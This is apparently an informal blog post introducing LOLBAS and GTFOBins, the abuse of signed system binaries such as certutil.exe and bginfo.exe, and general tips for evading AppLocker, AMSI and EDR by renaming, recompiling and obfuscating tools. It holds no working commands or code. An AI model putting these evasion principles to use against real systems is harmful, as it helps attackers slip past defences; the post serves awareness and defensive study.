LOLBAS!? WTF!?

LOLBAS stand for ‘Living of the land binaries and script’. WTF stands for What the…well y’know. ;)

Essentially, this is the concept of attacker repurposing legitimate Microsoft signed application/binaries to download/execute malicious scripts without leaving a file behind to eventually achieve strategic goals such as: privilege escalation, lateral movement, persistence, and C2 communication. This is still an effective way to evade AV & EDR detection and many blue team still struggle with baselining the usage of these within their own environment.

Another project called GTFOBins are the ones that are used in the ‘nix environment.

Attack vector

According to the LOLBAS Github, the usage of these LOLBINS can:

• execute code
• download/upload files
• compile code
• bypass UAC
• get creds/dumping process
• surveillance (keylogger, network trace)
• evade logging/remove log entry
• side-loading/hijacking of DLL
• pass-through execution of other programs, script (via a LOLBin)
• pass-through persistence utilizing existing LOLBin
• persistence (Hide data in ADS, execute at logon etc)

Example?

• For example, bginfo.exe is a legit binary that usually displays host info on your desktop. However, it can be used to also invoke a script to launch a payload.
• Certutil.exe is another fun one - its purposed use is to dumps and display CA config info and verify certs. However, an attacker can use it to bypass whitelisting and download/write data to the filesystem. It support decoding/encoding stuffs as well!

Often times, many of these can be chained to achieve persistence and goes undetected.

Bypassing Applocker / AMSI / Defender / EDR Agent

• So how does it do this? Microsoft and many of these EDR vendors have some sort of “reputation” score… Since the binary itself is signed by Microsoft…it must be good…and therefore, it goes unchallenged.

Usually, a lot of these EDR tools will use the concept of “whitelisting” applications. If you execute something on that whitelist, and it passes the reputational scoring, it will let you go through!

• What other ways we can use to get around it? These are some of the principles to follow:
• Change all the defaults - change up variables, recompile the binaries, rename the binaries, obfuscate strings
• Write your own - look at the source code, can you import the library and do similar things? write different functions that will do essentially the same thing.
• Live off the lands - Abuses the trust controls in place of existing system utilities

Detections?

I am getting sleepy… so I will write another blog on how to detect LOLBAS execution tomorrow. Check back later! :)

Resources:

• https://lolbas-project.github.io/
• https://gtfobins.github.io/
• https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md

Acknowledgement:

• Thank you Oddvar Moe @api0cradle for mainting the LoLBAS project.
• Matt Graeber @mattifestation for coining the term, and for some really amazing work in this field!